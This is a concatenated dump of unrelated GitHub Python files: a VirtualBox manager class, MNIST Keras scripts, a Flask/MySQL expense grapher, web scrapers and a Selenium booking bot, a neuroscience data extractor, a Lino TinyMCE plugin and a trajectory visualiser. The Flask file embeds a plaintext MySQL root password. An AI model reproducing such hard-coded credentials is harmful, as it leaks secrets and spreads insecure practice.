utf8 -*-\n__author__ = 'Razy.Chen'\nfrom socket_processor import *\nfrom Vm_Class import VirtualMachineInfo\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n#服务端宿主机信息类,用于储存宿主机相关信息,其中包涵虚拟机信息类与跟服务端宿主���通讯的socket_processor对象及其相关函数\nclass HostInfo(QMainWindow):\n def __init__(self,Vcenter):\n QWidget.__init__(self,parent=None)\n #Vcenter实例化对象,用于定义信号\n self.Vcenter=Vcenter\n #宿主机对象对应的vbox命令操作模块,并将自身作为参数传入\n #服务端对应的socket通讯对象\n self.socket_processor=Socket_processor()\n self.socket_processor.vb.host=self\n self.socket_processor.callVcenter=self.hostcallVcenter\n self.connect(self,SIGNAL('callVcenter(QString,QString,QString,QString)'),self.Vcenter.hostcallVcenter)\n self.connect(self,SIGNAL('reportfailure(QString)'),self.Vcenter.reportfailure)\n\n #宿主机FTP状态\n self.FTPstate=False\n\n #宿主机名称\n self.Name=None\n\n #是否连接\n self.isOnline=False\n\n #宿主机IP地址\n self.IPAddr=None\n\n #宿主机操作系统\n self.OSTypeId=None\n\n #宿主机CPU信息\n self.CPUInfo=None\n\n #宿主机CPU物理核心数\n self.CoreCount=None\n\n #宿主机CPU逻辑核心数\n self.CPUCount=None\n\n #宿主机内存大小\n self.MemorySize=None\n\n #宿主机内存当前可用大小\n self.MemoryAvailable=None\n\n #宿主机CPU使用率\n self.CPUUsage=None\n\n #宿主机网络适配器名称(用于虚拟网卡桥接设定)\n self.HostNetworkAdapter=[]\n\n #宿主机VM文件夹所在分区总大小\n self.DiskTotalSize=None\n\n #宿主机VM文件夹所在分区已用大小\n self.DiskUsageSize=None\n\n #宿主机VM文件夹所在分区使用率\n self.DiskUsage=None\n\n #宿主机VM文件夹大小\n self.VboxTotalSize=None\n\n #服务端包含的虚拟机对象列表\n self.VMList=[]\n\n #向Vcenter发送产生错误的信号的函数\n def reportfailure(self,failureMSG):\n failureMSG=str(failureMSG)\n self.emit(SIGNAL('reportfailure(QString)'),failureMSG)\n\n #向Vcenter发送状态的信号的函数\n def hostcallVcenter(self,IPAddr='',state='',reflashtree='',reflash=''):\n state=QString(state)\n reflashtree=QString(reflashtree)\n reflash=QString(reflash)\n self.emit(SIGNAL('callVcenter(QString,QString,QString,QString)'),IPAddr,state,reflashtree,reflash)\n # print('Host.Info.hostcallVcenter')\n # print(IPAddr,state,reflashtree,reflash)\n","repo_name":"pvt54/VboxCenter","sub_path":"Host_Class.py","file_name":"Host_Class.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24015646133","text":"# import numpy as np\n# import mnist\n# from tensorflow import keras\n# from tensorflow.keras.models import Sequential\n# from tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense\n# from tensorflow.keras.utils import to_categorical\n\n# train_images=mnist.train_images() #load the training images\n# train_labels=mnist.train_labels() #load the training labels\n# test_images=mnist.test_images() #load the test images\n# test_labels=mnist.test_labels() #load the test labels\n\n# # print(train_images.shape) #train_images is a numpy array of shape (60000,28,28)\n# #using the 28x28 images of the mnist dataset to train the model\n# #print(train_labels.shape) \n# #train_labels is a numpy array of shape (60000,1) containing the labels of the training data\n\n# train_images=(train_images/255)-0.5 #normalize the images to be between -0.5 and 0.5\n# test_labels=(test_labels/255)-0.5 #normalize the images to be between -0.5 and 0.5\n\n# #print(train_images) #print the normalized training images\n\n# train_images=np.expand_dims(train_images,axis=3) #add a dimension to the images to make them 3 dimensional (28x28x1)\n# test_images=np.expand_dims(test_images,axis=3) #add a dimension to the images to make them 3 dimensional (28x28x1)\n\n# num_filters=8 #number of filters in the convolutional layer\n# filter_size=3 #size of the filter\n# pool_size=2 #size of the pooling window\n\n# #create a sequential model\n# model=Sequential([ \n# Conv2D(num_filters,filter_size,input_shape=(28,28,1)),\n# MaxPooling2D(pool_size),\n# Flatten(),\n# Dense(10,activation='softmax')\n# ])\n\n# model.compile('adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n# model.fit(train_images,to_categorical(train_labels),epochs=3,validation_data=(test_images,to_categorical(test_labels)))\n# model.summary() #print the model summary\n#inthis code issue during the training of the model, the model is not able to train properly.\n#----------------\n\n#Eng Yazan Code:\nimport numpy as np\nimport mnist\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Flatten\nfrom tensorflow.keras.utils import to_categorical\n\ntrain_images = mnist.train_images()\ntrain_labels = mnist.train_labels()\ntest_images = mnist.test_images()\ntest_labels = mnist.test_labels()\n\ntrain_images = (train_images / 255) - 0.5\ntest_images = (test_images / 255) - 0.5\n\ntrain_images = np.expand_dims(train_images, axis = 3)\ntest_images = np.expand_dims(test_images, axis = 3)\n\nnum_filters = 8\nfilter_size = 3\npool_size = 2\n\nmodel = Sequential([ \n Conv2D(num_filters, filter_size, input_shape = (28,28,1)),\n MaxPooling2D(pool_size),\n Flatten(),\n Dense(10, activation = 'softmax')\n])\n\nmodel.compile('adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n# model.fit(train_images, to_categorical(train_labels), epochs = 3, validation_data=(test_images,to_categorical(test_labels)))\n\n# model.save_weights('weights.h5') #save the weights of the model first step\n#you must comment out the above line model.fit() and madel.save_weights() to run the below line\n \n#load the weights of the model\nmodel.load_weights('weights.h5')\n\n#predect on the first 5 test images\npredictions = model.predict(test_images[:20])\n\n#print the predictions\nprint(np.argmax(predictions, axis = 1)) \nprint(test_labels[:20]) #print the labels of the test images to compare with the predictions\n\n#to check the accuracy of the model\n","repo_name":"NoorTaamreh/HTU-DataScience","sub_path":"ML/Session40A.py","file_name":"Session40A.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35048621947","text":"from flask import Flask,send_file,redirect,url_for,render_template,request\nimport yaml\nimport pymysql\nimport io\nimport base64\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\napp=Flask(__name__)\n\nhost = \"127.0.0.1\"\nuser = \"root\"\npassword = \"Mpbirla25@\"\ndb = \"expense\"\ncon = pymysql.connect(host=host , user=user , password=password , db=db , cursorclass=pymysql.cursors.DictCursor)\ncursor=con.cursor()\n\nx=[]\ny=[]\n\n@app.route('/input',methods=['GET','POST'])\ndef test():\n if request.method == 'POST':\n user = request.form\n income = user['Income']\n expense = user['Expense']\n cur=con.cursor()\n if income is not None:\n cur.execute(\"INSERT INTO expense.cost(Income,Expense) VALUES(%s,%s)\",(income,expense))\n else:\n cur.execute(\"INSERT INTO expense.cost(Expense) VALUES(%s)\",(expense))\n con.commit()\n\n #return 'success'\n return redirect(url_for('product'))\n return render_template('input.html')\n\n@app.route('/product')\ndef product():\n cursor.execute(\"select Income,Expense from expense.cost\")\n res=cursor.fetchall()\n return render_template(\"product.html\",result=res)\n\nfig,ax=plt.subplots(figsize=(6,6))\nax=sns.set_style(style=\"darkgrid\")\n\n#x=[1,28,34,45,77,78,89,99]\n#y=[10,38,68,78,77,33,64,789]\n\ndef sum(arr):\n s=0\n for i in arr:\n s=s+1\n return s\n\n@app.route('/')\ndef home():\n return render_template(\"index.html\",content=\"Expense Graph\")\n\n@app.route('/visualize')\ndef visualize():\n #x=[]\n #y=[]\n cursor.execute(\"select Income,Expense from expense.cost\")\n res=cursor.fetchall()\n for row in res:\n x.append(row['Income'])\n y.append(row['Expense'])\n #plt.plot(x,y)\n #s=sum(x)\n #res=y[0]-s\n\n z=sns.barplot(y,x)\n z.set(xlabel='Income',ylabel='Expense')\n canvas=FigureCanvas(fig)\n img=io.BytesIO()\n fig.savefig(img)\n img.seek(0)\n return send_file(img,mimetype='img/png')\n\n@app.route('/testy')\ndef testy():\n return render_template(\"testy.html\",array=x)\n\nif __name__=='__main__':\n app.run()\n","repo_name":"diptarkagupta81/Expense-Calculator-with-plotted-Graph-using-Seaborn-Flask","sub_path":"Amphoria/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11277172719","text":"class Solution:\n def divisibilityArray(self, word: str, m: int) -> List[int]:\n res = []\n temp = 0\n for i in word:\n temp = temp*10+int(i)\n if(temp%m): res.append(0)\n else: res.append(1)\n temp%=m\n\n return res","repo_name":"naveen-chokkapu/leetCode","sub_path":"2713-find-the-divisibility-array-of-a-string/find-the-divisibility-array-of-a-string.py","file_name":"find-the-divisibility-array-of-a-string.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24740065780","text":"import glob\nimport numpy as np\nimport random as random\nimport pandas as pd\nfrom math import *\nfrom datetime import datetime\nfrom scipy.stats import rankdata\n\nfrom pipeline_helper_functions import *\nfrom get_edge_data import *\n\n\ndef get_test_cases(G, active_years, num_test_cases, seed=None):\n \"\"\"\n Get a list of test cases\n - test cases must have at least one citation\n - cited case year must be strictly less than citing case year\n\n Parameters\n ----------\n G: igraph object\n\n active_years: list of possible citing years\n\n num_test_cases: number of test cases\n\n seed: seed for sampling vertices\n\n Output\n ------\n returns a list of test cases (igraph vertices)\n \"\"\"\n\n # seed for selecting test cases\n if seed:\n random.seed(seed)\n\n # select cases for sample\n possible_citing_cases = set(G.vs.select(year_ge=min(active_years),\n year_le=max(active_years)))\n\n # other data we might want to keep track of\n test_cases = set()\n\n # run until we get enough test cases\n while(len(test_cases) < num_test_cases):\n\n # randomly select a case\n test_case = random.sample(possible_citing_cases, 1)[0]\n\n # test case citing year\n ing_year = test_case['year']\n\n # get neighbors first as ig index\n cited_cases = G.neighbors(test_case.index, mode='OUT')\n\n # only keep cited cases coming in years strictly before citing year\n cited_cases_pre = [ig_id for ig_id in cited_cases\n if G.vs[ig_id]['year'] < ing_year]\n\n # only add cases who have at least one citation\n if len(cited_cases_pre) >= 1:\n # make sure case has already been added\n if test_case not in test_cases:\n test_cases.add(test_case)\n\n return list(test_cases)\n\n\ndef get_cited_cases(G, citing_vertex):\n \"\"\"\n Returns the ciations of a cases whose cited year\n is strictly less than citing year\n\n Parameters\n ----------\n G: igraph object\n\n citing_vertex: igraph vertex\n\n Output\n ------\n list of CL ids of cited cases\n \"\"\"\n\n # get neighbors first as ig index\n all_citations = G.neighbors(citing_vertex.index, mode='OUT')\n\n # return CL indices of cases\n # only return cited cases whose year is stictly less than citing year\n return [G.vs[ig_id]['name'] for ig_id in all_citations\n if G.vs[ig_id]['year'] < citing_vertex['year']]\n\n\ndef get_rank_by_metric(edge_data, metric):\n \"\"\"\n Sorts cases by a given metric\n\n Parameters\n ----------\n edge_data: edge data frame\n\n metric: a single column from edge_data\n\n Output\n ------\n CL ids of ranked cases\n \"\"\"\n ranking = pd.DataFrame(columns=['rank'],\n index=[e[1] for e in edge_data.index])\n\n if metric in ['age']: # small is good\n scores = edge_data[metric]\n\n else: # large is goo\n scores = - edge_data[metric]\n\n ranking['rank'] = np.floor(rankdata(scores))\n\n return ranking\n","repo_name":"idc9/law-net","sub_path":"vertex_metrics_experiment/code/experiment_helper_functions.py","file_name":"experiment_helper_functions.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"37050100307","text":"from pg_model import PgModel\nfrom mongo_model import MongoModel\n\ndef main(pg_model, mongo_model):\n # informations migrate\n informations = pg_model.get_informations()\n print(informations)\n\n for information in informations:\n mongo_model.add_information(information[\"title\"], information[\"content\"])\n\n # portfolios migrate\n portfolios = pg_model.get_portfolios()\n print(portfolios)\n\n for portfolio in portfolios:\n mongo_model.add_portfolios(\n portfolio[\"id\"],\n portfolio[\"title\"],\n portfolio[\"content\"],\n portfolio[\"githubLink\"],\n portfolio[\"techStack\"]\n )\n\nif __name__ == \"__main__\":\n main(PgModel(), MongoModel())\n","repo_name":"z3zzz/distributed-tech-stack","sub_path":"api-python/model/migrate.py","file_name":"migrate.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"9632210713","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\n\nheaders = {\"User-Agent\" : \"\"}\n\nfor i in range(1, 3): #원하는 페이지 수\n url = \"https://www.coupang.com/np/search?q=%ED%9C%B4%EB%8C%80%ED%8F%B0&channel=user&component=&eventCategory=SRP&trcid=&traid=&sorter=scoreDesc&minPrice=&maxPrice=&priceRange=&filterType=&listSize=36&filter=&isPriceRange=false&brand=&offerCondition=&rating=0&page={}&rocketAll=false&searchIndexingToken=1=4&backgroundColor=\".format(i)\n print(\"페이지 : \", i)\n print(\"-\"*100)\n res = requests.get(url, headers = headers)\n res.raise_for_status()\n soup = BeautifulSoup(res.text, \"lxml\")\n\n items = soup.find_all(\"li\", attrs={\"class\" : re.compile(\"search-product\")})\n\n for item in items:\n \n ad = item.find(\"span\", attrs={\"class\" : \"ad-badge-text\"}) #광고 제외\n if ad: \n continue\n\n name = item.find(\"div\", attrs={\"class\" : \"name\"}).get_text() #제품\n price = item.find(\"strong\", attrs={\"class\" : \"price-value\"}).get_text() #가격\n rate = item.find(\"em\", attrs={\"class\" : \"rating\"}) #평점\n if rate: #평점 없을 경우 패스\n rate = rate.get_text() \n else:\n continue\n\n link = \"https://www.coupang.com\" + item.a[\"href\"] #링크 첨부\n \n\n if float(rate) >= 4.5:\n print(f\"제품 명 : {name}\")\n print(f\"가격 : {price}\")\n print(f\"평점 : {rate}\")\n print(f\"링크 : {link}\")\n print(\"-\"*100)\n\n\n","repo_name":"123qpq/web_scrapping","sub_path":"10_bs4_coupangpage.py","file_name":"10_bs4_coupangpage.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17888321157","text":"from pathlib import Path\n\nfrom spikeinterface.core.core_tools import define_function_from_class\n\nfrom .neobaseextractor import NeoBaseRecordingExtractor, NeoBaseEventExtractor\n\n\nclass AlphaOmegaRecordingExtractor(NeoBaseRecordingExtractor):\n \"\"\"\n Class for reading from AlphaRS and AlphaLab SnR boards.\n\n Based on :py:class:`neo.rawio.AlphaOmegaRawIO`\n\n Parameters\n ----------\n folder_path: str or Path-like\n The folder path to the AlphaOmega recordings.\n lsx_files: list of strings or None, optional\n A list of listings files that refers to mpx files to load.\n stream_id: {'RAW', 'LFP', 'SPK', 'ACC', 'AI', 'UD'}, optional\n If there are several streams, specify the stream id you want to load.\n stream_name: str, optional\n If there are several streams, specify the stream name you want to load.\n all_annotations: bool, default: False\n Load exhaustively all annotations from neo.\n \"\"\"\n\n mode = \"folder\"\n NeoRawIOClass = \"AlphaOmegaRawIO\"\n name = \"alphaomega\"\n\n def __init__(self, folder_path, lsx_files=None, stream_id=\"RAW\", stream_name=None, all_annotations=False):\n neo_kwargs = self.map_to_neo_kwargs(folder_path, lsx_files)\n NeoBaseRecordingExtractor.__init__(\n self, stream_id=stream_id, stream_name=stream_name, all_annotations=all_annotations, **neo_kwargs\n )\n self._kwargs.update(dict(folder_path=str(Path(folder_path).absolute()), lsx_files=lsx_files))\n\n @classmethod\n def map_to_neo_kwargs(cls, folder_path, lsx_files=None):\n neo_kwargs = {\n \"dirname\": str(folder_path),\n \"lsx_files\": lsx_files,\n }\n return neo_kwargs\n\n\nclass AlphaOmegaEventExtractor(NeoBaseEventExtractor):\n \"\"\"\n Class for reading events from AlphaOmega MPX file format\n \"\"\"\n\n mode = \"folder\"\n NeoRawIOClass = \"AlphaOmegaRawIO\"\n handle_event_frame_directly = True\n\n def __init__(self, folder_path):\n neo_kwargs = self.map_to_neo_kwargs(folder_path)\n NeoBaseEventExtractor.__init__(self, **neo_kwargs)\n\n @classmethod\n def map_to_neo_kwargs(cls, folder_path):\n neo_kwargs = {\"dirname\": str(folder_path)}\n return neo_kwargs\n\n\nread_alphaomega = define_function_from_class(source_class=AlphaOmegaRecordingExtractor, name=\"read_alphaomega\")\nread_alphaomega_event = define_function_from_class(source_class=AlphaOmegaEventExtractor, name=\"read_alphaomega_event\")\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/extractors/neoextractors/alphaomega.py","file_name":"alphaomega.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"9498601103","text":"import time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport pyautogui\r\n\r\n#Dimensões da tela: 1920 x 1080\r\n\r\n# Inicializar o WebDriver do Chrome\r\ndriver = webdriver.Edge()\r\n\r\n# Acessar o site do Trivago\r\ndriver.get(\"http://www.trivago.com.br\")\r\ntime.sleep(10)\r\n\r\nsearch_form = driver.find_element(By.XPATH, \"//span[@data-testid='search-form-destination-value']\")\r\nsearch_form.click()\r\ntime.sleep(5)\r\n\r\n# Digitar \"Manaus\" no campo de busca\r\nsearch_input = driver.find_element(by=By.ID, value=\"input-auto-complete\")\r\nsearch_input.click()\r\nsearch_input.click()\r\nsearch_input.send_keys(\"Manaus\")\r\ntime.sleep(5)\r\n#Clicar enter\r\npyautogui.press('enter')\r\npyautogui.press('enter')\r\ntime.sleep(5)\r\n\r\n#Confirmar data\r\n#Dia 05\r\ndatee_button = driver.find_element(by=By.XPATH, value=\"//*[@id='overlay-root']/div/section/main/div/div/div/div[2]/div[1]/div/button[9]/time\")\r\ndatee_button.click()\r\n#Dia 06\r\ndatee_button = driver.find_element(by=By.XPATH, value=\"//*[@id='overlay-root']/div/section/main/div/div/div/div[2]/div[1]/div/button[10]/time\")\r\ndatee_button.click()\r\ntime.sleep(5)\r\n\r\n#Aplicar Data\r\napply_button = driver.find_element(by=By.XPATH, value=\"//*[@id='overlay-root']/div/section/footer/div/div/div/button[2]\")\r\napply_button.click()\r\ntime.sleep(5)\r\n\r\n#Confirmar reserva\r\nreserva_button = driver.find_element(by=By.XPATH, value=\"//*[@id='overlay-root']/div/section/footer/div/div/div/button[2]\")\r\nreserva_button.click()\r\ntime.sleep(5)\r\n\r\n#Clicar em pesquisar\r\npesquisa_button = driver.find_element(by=By.XPATH, value=\"//*[@id='__next']/div[1]/div[1]/section/div[2]/div[2]/div/button\")\r\npesquisa_button.click()\r\ntime.sleep(5)\r\n\r\n#Screenshot da tela de requisição\r\ndriver.save_screenshot(\"tela_de_requisicao.png\")\r\nprint(\"Screenshot da tela de requisicao!\")\r\ntime.sleep(3)\r\n\r\n#Tempo de espera da requisicao do site\r\ntime.sleep(50)\r\npyautogui.press('enter')\r\npyautogui.press('enter')\r\ntime.sleep(50)\r\n\r\n# Dimensões da tela\r\nlargura, altura = pyautogui.size()\r\nprint(f\"Dimensões da tela: {largura} x {altura}\")\r\n\r\n# Obtém a posição atual do cursor\r\nposicao_atual = pyautogui.position()\r\nprint(f\"Posição atual do cursor: {posicao_atual.x}, {posicao_atual.y}\")\r\n\r\n# Coordenadas do botão de pesquisa\r\nx = 897\r\ny = 239\r\n\r\n# Movre o mouse para as coordenadas do botão de pesquisa e clica\r\npyautogui.moveTo(x, y)\r\npyautogui.click()\r\n\r\n#filtrar por avaliacao\r\navaliacao_filtro = driver.find_element(by=By.XPATH, value=\"//*[@id='sorting-selector']/option[2]\")\r\navaliacao_filtro.click()\r\ntime.sleep(5)\r\npyautogui.press('enter')\r\n\r\n#clicar fora para sumir a tela de filtro\r\nx = 447\r\ny = 393\r\npyautogui.moveTo(x, y)\r\npyautogui.click()\r\n\r\ntime.sleep(10)\r\ntime.sleep(10)\r\n\r\n#Screenshot da tela de avaliação\r\ndriver.save_screenshot(\"avaliacao.png\")\r\nprint(\"Screenshot do primeiro resultado!\")\r\ntime.sleep(3)\r\n\r\ndriver.quit()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"lleonardx/QAEng","sub_path":"python-desafio_3/desafio_3.py","file_name":"desafio_3.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73720853287","text":"from lino.api import ad\n\n\n#TINYMCE_VERSION = '3.4.8'\n#TINYMCE_VERSION = '4.1.10'\nTINYMCE_VERSION = '3.5.11'\n\n\"\"\"Which version of TinyMCE to use.\n\nWith 4.1.10, windows containing a TextField don't open, and the JS\nconsole says \"TypeError: sp is undefined\". That's because we did not\nyet get Andrew Mayorov's\n:srcref:`lino/modlib/tinymce/static/byteforce/Ext.ux.TinyMCE.js` to\nwork with TinyMCE 4. It seems that either ControlManager or\nWindowManager no longer are functions in tinymce4.\n\n\"\"\"\n\n\ndef javascript(url):\n return ''.format(url)\n\n\nclass Plugin(ad.Plugin):\n \"See :doc:`/dev/plugins`.\"\n\n needs_plugins = ['lino.modlib.office']\n # needs_plugins = ['lino.modlib.office', 'lino.modlib.extjs']\n\n site_js_snippets = ['tinymce/tinymce.js']\n\n url_prefix = 'tinymce'\n\n # window_width = 600\n # window_height = 500\n\n document_domain = None\n \"\"\"The domain name of this production site.\"\"\"\n\n window_width = 500\n \"\"\"The initial width of the window to use when editing in own\n window.\n\n \"\"\"\n\n window_height = 400\n \"\"\"The initial height of the window to use when editing in own\n window.\n\n \"\"\"\n\n field_buttons = (\n \"bold,italic,underline,|,justifyleft,justifycenter,justifyright,|,\"\n \"bullist,numlist,|,outdent,indent,|,undo,redo,|,removeformat,template\")\n \"\"\"The toolbar buttons when editing a field inside a detail form.\"\"\"\n\n window_buttons1 = (\n \"save,cancel,|,bold,italic,underline,|,justifyleft,justifycenter,\"\n \"justifyright,fontselect,fontsizeselect,formatselect,|,\"\n \"search,replace\")\n \"\"\"The first row of toolbar buttons when editing in own window.\"\"\"\n window_buttons2 = (\n \"cut,copy,paste,template,|,bullist,numlist,|,outdent,indent,|,\"\n \"undo,redo,|,link,unlink,anchor,image,|,code,preview,|,forecolor,\"\n \"backcolor\")\n \"\"\"The second row of toolbar buttons when editing in own window.\"\"\"\n\n window_buttons3 = (\n \"insertdate,inserttime,|,spellchecker,advhr,,removeformat,|,\"\n \"sub,sup,|,charmap,emotions,|,tablecontrols\")\n \"\"\"The third row of toolbar buttons when editing in own window.\"\"\"\n\n media_name = 'tinymce-' + TINYMCE_VERSION\n \"\"\"Lino currently includes three versions of TinyMCE, but for\n production sites we still use the eldest version 3.4.8.\n\n \"\"\"\n\n media_root = None\n # media_base_url = \"http://www.tinymce.com/js/tinymce/jscripts/tiny_mce/\"\n # media_base_url = \"http:////tinymce.cachefly.net/4.1/tinymce.min.js\"\n\n def get_used_libs(self, html=False):\n if html is not None:\n yield (\"TinyMCE\", TINYMCE_VERSION, \"http://www.tinymce.com/\")\n yield (\"Ext.ux.TinyMCE\", '0.8.4', \"http://www.byte-force.com\")\n\n def get_js_includes(self, settings, language):\n if settings.SITE.kernel.default_renderer.extjs_version:\n if TINYMCE_VERSION.startswith('3'):\n yield self.build_lib_url('tiny_mce.js')\n else:\n yield self.build_lib_url('tinymce.min.js')\n yield settings.SITE.build_static_url(\"byteforce\", \"Ext.ux.TinyMCE.js\")\n\n def get_patterns(self):\n from django.urls import re_path as url\n # from django.conf.urls import url\n from . import views\n\n rx = '^'\n\n urlpatterns = [\n url(rx + r'templates/(?P\\w+)/'\n + r'(?P\\w+)/(?P\\w+)/(?P\\w+)$',\n views.Templates.as_view()),\n url(rx + r'templates/(?P\\w+)/'\n + r'(?P\\w+)/(?P\\w+)/(?P\\w+)/'\n + r'(?P\\w+)$',\n views.Templates.as_view())]\n\n return urlpatterns\n\n def get_row_edit_lines(self, e, panel):\n from lino.core.elems import TextFieldElement\n if isinstance(e, TextFieldElement):\n if e.format == 'html':\n yield \"%s.refresh();\" % e.as_ext()\n\n def setup_config_menu(self, site, user_type, m):\n if site.user_model is not None:\n mg = site.plugins.office\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('tinymce.MyTextFieldTemplates')\n\n def setup_explorer_menu(self, site, user_type, m):\n if site.user_model is not None:\n mg = site.plugins.office\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('tinymce.TextFieldTemplates')\n","repo_name":"lino-framework/lino","sub_path":"lino/modlib/tinymce/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"18928581755","text":"\"\"\"\n\nby Hao Xue @ 30/08/18\n\n\"\"\"\nimport cv2\nfrom modules.visual_object import VisualObject\nimport numpy as np\nfrom tputils.dataprocessing.pixel_normalize import trajectory_matrix_norm\nimport os\nfrom typing import List, Dict\nfrom gv_tools.util.region import Region\nfrom gv_tools.util import visual, pather, core\nfrom gv_tools.tracking.track_frame import TrackFrame\nfrom gv_tools.tracking.tracklet import Tracklet\n\n\nclass DrawTrajectory:\n OUTPUT_PATH = '/home/ubuntu/Desktop/trajectory-visualization/ouput/nygc_pred/'\n color = (277, 277, 48)\n OBS_COLOR = (0, 255, 255)\n PRED_COLOR = (0, 255, 0)\n GT_COLOR = (255, 0, 0)\n\n def __init__(self, original_video: str, obs_data: str, predicted: str, ground_truth: str, data: str):\n self.video_cap = cv2.VideoCapture(original_video)\n self.obs = np.load(obs_data)\n self.predicted = np.load(predicted)\n self.predicted = trajectory_matrix_norm(self.predicted, 720, 480, 2)\n self.gt = np.load(ground_truth)\n self.data = np.load(data)\n\n def process(self):\n frame_index = 0\n while self.video_cap.isOpened():\n cap, frame = self.video_cap.read()\n\n img = np.copy(frame)\n # self.draw_all(img, frame_index)\n if frame_index > 41077:\n img = self.draw_obs(img, frame_index)\n img = self.draw_gt(img, frame_index)\n self.write_output(img, frame_index)\n frame_index += 1\n\n def process_frame(self):\n pass\n\n def draw_all(self, img, frame_index):\n draw_flag = False\n for t in self.data:\n for p in t:\n if p[-1] <= frame_index:\n draw_flag = True\n if draw_flag:\n for i in range(len(t)):\n point = t[i]\n if point[-1] < frame_index:\n cv2.circle(img, (point[0], point[1]), 4, color=self.color, thickness=-1)\n if i < len(t)-1:\n cv2.line(img, (point[0], point[1]), (t[i+1][0], t[i+1][1]), color=self.color, thickness=2)\n\n def draw_obs(self, img, frame_index):\n draw_flag = False\n for t in self.obs:\n for p in t:\n if p[-1] <= frame_index:\n draw_flag = True\n if draw_flag:\n for i in range(len(t)):\n point = t[i]\n if point[-1] < frame_index:\n cv2.circle(img, (point[0], point[1]), 2, color=self.OBS_COLOR, thickness=-1)\n if i < len(t)-1:\n cv2.line(img, (point[0], point[1]), (t[i+1][0], t[i+1][1]), color=self.OBS_COLOR, thickness=1)\n\n return img\n\n def draw_gt(self, img, frame_index):\n draw_flag = False\n for index in range(len(self.gt)):\n for p in self.gt[index]:\n if p[-1] <= frame_index:\n draw_flag = True\n if draw_flag:\n traj = self.predicted[index]\n for i in range(len(traj)):\n point = traj[i]\n if point[-1] < frame_index:\n cv2.circle(img, (int(point[0]), int(point[1])), 2, color=self.PRED_COLOR, thickness=-1)\n if i < len(traj)-1:\n cv2.line(img, (int(point[0]), int(point[1])),\n (int(traj[i+1][0]), int(traj[i+1][1])), color=self.PRED_COLOR, thickness=1)\n for i in range(len(self.gt[index])):\n point = self.gt[index][i]\n if point[-1] < frame_index:\n cv2.circle(img, (point[0], point[1]), 2, color=self.GT_COLOR, thickness=-1)\n if i < len(self.gt[index])-1:\n cv2.line(img, (point[0], point[1]),\n (self.gt[index][i+1][0], self.gt[index][i+1][1]),\n color=self.GT_COLOR, thickness=1)\n return img\n\n def write_output(self, img, frame_index):\n output_path = self.OUTPUT_PATH + str(frame_index).zfill(8) + '.jpg'\n cv2.imwrite(output_path, img)\n\n\nd = DrawTrajectory(original_video='/home/ubuntu/Downloads/grandcentral.avi',\n data='/home/ubuntu/Desktop/TPSPM/data/o9_p8.npy',\n obs_data='/home/ubuntu/Desktop/TPSPM/results/NYGC_setting_o9_p8/obs.npy',\n predicted='/home/ubuntu/Desktop/TPSPM/results/NYGC_setting_o9_p8/1_predicted.npy',\n ground_truth='/home/ubuntu/Desktop/TPSPM/results/NYGC_setting_o9_p8/gt.npy')\nd.process()\n\n# a = np.load('/home/ubuntu/Desktop/TPSPM/results/NYGC_setting_o9_p8/gt.npy')\n# print(a.shape)\n# print(np.min(a[:, :, -1]))\n","repo_name":"xuehaouwa/trajectory-visualization","sub_path":"scripts/draw_trajectory.py","file_name":"draw_trajectory.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"13001895700","text":"#!/usr/bin/env python3\nimport toga\nfrom toga.style.pack import *\n# Author: StpircsDahc\n# Author's github repo - https://github.com/stpircsdahc\n\n\n\ndef discountit(cost, discount):\n print('tag tag tag')\n dPercentage = float(discount)/100.0\n salePrice = float(cost) - (float(cost) * dPercentage)\n salePrice = round(salePrice, 2)\n return salePrice\n\ndef markitup(cost, markup):\n muPercentage = float(markup)/100.0\n salePrice = float(cost) + (float(cost) * muPercentage)\n salePrice = round(salePrice, 2)\n gp = round(salePrice - cost, 2)\n return salePrice, gp\n\ndef build(app):\n msrp_box = toga.Box()\n discount_box = toga.Box()\n dPrice_box = toga.Box()\n markup_box = toga.Box()\n fPrice_box = toga.Box()\n GrossProfit_box = toga.Box()\n box = toga.Box()\n\n msrp_input = toga.TextInput()\n discount_input = toga.TextInput()\n 